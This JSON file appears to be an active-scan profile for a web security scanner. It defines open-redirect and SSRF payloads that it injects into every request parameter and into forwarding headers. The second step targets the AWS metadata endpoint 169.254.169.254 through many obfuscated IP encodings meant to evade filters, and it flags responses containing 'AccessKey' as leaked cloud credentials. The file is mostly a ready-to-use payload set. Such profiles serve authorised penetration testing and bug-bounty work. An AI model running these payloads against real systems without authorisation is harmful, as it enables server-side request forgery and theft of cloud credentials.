[
  {
    "profile_name": "OpenRedirect_SSRF",
    "enabled": true,
    "scanner": "active",
    "author": "@bountysecurity",
    "steps": [
      {
        "request_type": "original",
        "reuse_cookie": false,
        "insertion_point": "same",
        "raw_request": "",
        "payloads": [
          "true,http://{BH}",
          "true,//{BH}",
          "true,{BH}",
          "true,///{BH}",
          "true,http:{BH}",
          "true,\\/\\/{BH}",
          "true,{CURRENT_PROTOCOL}://{CURRENT_HOST}@{BH}",
          "true,{CURRENT_PROTOCOL}://{CURRENT_HOST}.{BH}",
          "true,{CURRENT_PROTOCOL}://{BH}\\\\@{CURRENT_HOST}/",
          "true,{CURRENT_PROTOCOL}://{BH}/{CURRENT_HOST}/"
        ],
        "payloads_file": "",
        "payload_position": "replace",
        "change_http_request": false,
        "change_http_request_type": "post_to_get",
        "insertion_points": [
          "all",
          "extension_provice",
          "user_agent",
          "entire_body",
          "param_body",
          "param_cookie",
          "param_json",
          "url_path_folder",
          "param_multipart_attr",
          "param_name_body",
          "param_name_url",
          "user_provided",
          "param_url",
          "param_xml",
          "param_xml_attr",
          "url_path_filename",
          "param_name_cookie",
          "param_name_xml",
          "param_name_xml_attr",
          "param_name_multi_part_attr",
          "param_name_json",
          "referer",
          "origin",
          "host",
          "content_type",
          "accept",
          "accept_language",
          "accept_encoding",
          "new_headers",
          "entire_body_xml",
          "entire_body_json",
          "entire_body_multipart"
        ],
        "header_value": true,
        "new_headers": [
          "X-Forwarded-For",
          "X-Host",
          "X-Forwarded-Server",
          "X-Forwarded-Scheme",
          "X-Original-URL",
          "X-Rewrite-URL",
          "Forwarded",
          "Origin",
          "Referer",
          "X-Forwarded-Host",
          "X-Forwarded-Proto",
          "X-ProxyUser-Ip",
          "X-Wap-Profile",
          "Client-IP",
          "True-Client-IP",
          "Cluster-Client-IP",
          "X-Custom-IP-Authorization"
        ],
        "match_replace": [],
        "encoder": [],
        "url_encode": false,
        "chars_to_url_encode": "",
        "greps_file": "",
        "grep": [
          "true,,Blind Host,,"
        ],
        "redir_type": "always",
        "max_redir": 5,
        "show_alert": "always",
        "issue_name": "OpenRedirect_SSRF",
        "issue_severity": "High",
        "issue_confidence": "Firm",
        "issue_detail": "* https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery\n\n\u003cbr/\u003e\u003cbr/\u003e- PAYLOAD: \u003cbr/\u003e\u003cpayload\u003e\n\u003cbr/\u003e\u003cbr/\u003e\n- GREP: \u003cbr/\u003e\u003cgrep\u003e",
        "remediation_detail": "",
        "issue_background": "",
        "remediation_background": ""
      },
      {
        "request_type": "original",
        "reuse_cookie": false,
        "insertion_point": "same",
        "raw_request": "",
        "payloads": [
          "true,http://169.254.169.254/latest/meta-data/",
          "true,http://instance-data/latest/meta-data/",
          "true,http://169.254.169.254.nip.io/latest/meta-data/",
          "true,http://425.510.425.510/latest/meta-data/",
          "true,http://2852039166/latest/meta-data/",
          "true,http://7147006462/latest/meta-data/",
          "true,http://0xA9.0xFE.0xA9.0xFE/latest/meta-data/",
          "true,http://0xA9FEA9FE/latest/meta-data/",
          "true,http://0x41414141A9FEA9FE/latest/meta-data/",
          "true,http://0251.0376.0251.0376/latest/meta-data/",
          "true,http://0251.00376.000251.0000376/latest/meta-data/",
          "true,http://0251.254.169.254/latest/meta-data/",
          "true,http://[::ffff:a9fe:a9fe]/latest/meta-data/",
          "true,http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/",
          "true,http://[0:0:0:0:0:ffff:169.254.169.254]/latest/meta-data/",
          "true,http://[fd00:ec2::254]/latest/meta-data/"
        ],
        "payloads_file": "",
        "payload_position": "replace",
        "change_http_request": false,
        "change_http_request_type": "post_to_get",
        "insertion_points": [
          "all",
          "extension_provice",
          "user_agent",
          "entire_body",
          "param_body",
          "param_cookie",
          "param_json",
          "url_path_folder",
          "param_multipart_attr",
          "param_name_body",
          "param_name_url",
          "user_provided",
          "param_url",
          "param_xml",
          "param_xml_attr",
          "url_path_filename",
          "param_name_cookie",
          "param_name_xml",
          "param_name_xml_attr",
          "param_name_multi_part_attr",
          "param_name_json",
          "referer",
          "origin",
          "host",
          "content_type",
          "accept",
          "accept_language",
          "accept_encoding",
          "entire_body_xml",
          "entire_body_json",
          "entire_body_multipart"
        ],
        "header_value": true,
        "new_headers": [],
        "match_replace": [],
        "encoder": [],
        "url_encode": false,
        "chars_to_url_encode": "",
        "greps_file": "",
        "grep": [
          "true,,Simple String,,AccessKey"
        ],
        "redir_type": "always",
        "max_redir": 5,
        "show_alert": "always",
        "issue_name": "SSRF_AWSCredentials",
        "issue_severity": "High",
        "issue_confidence": "Certain",
        "issue_detail": "",
        "remediation_detail": "",
        "issue_background": "",
        "remediation_background": ""
      }
    ],
    "Tags": [
      "SSRF",
      "Open Redirect",
      "All"
    ]
  }
]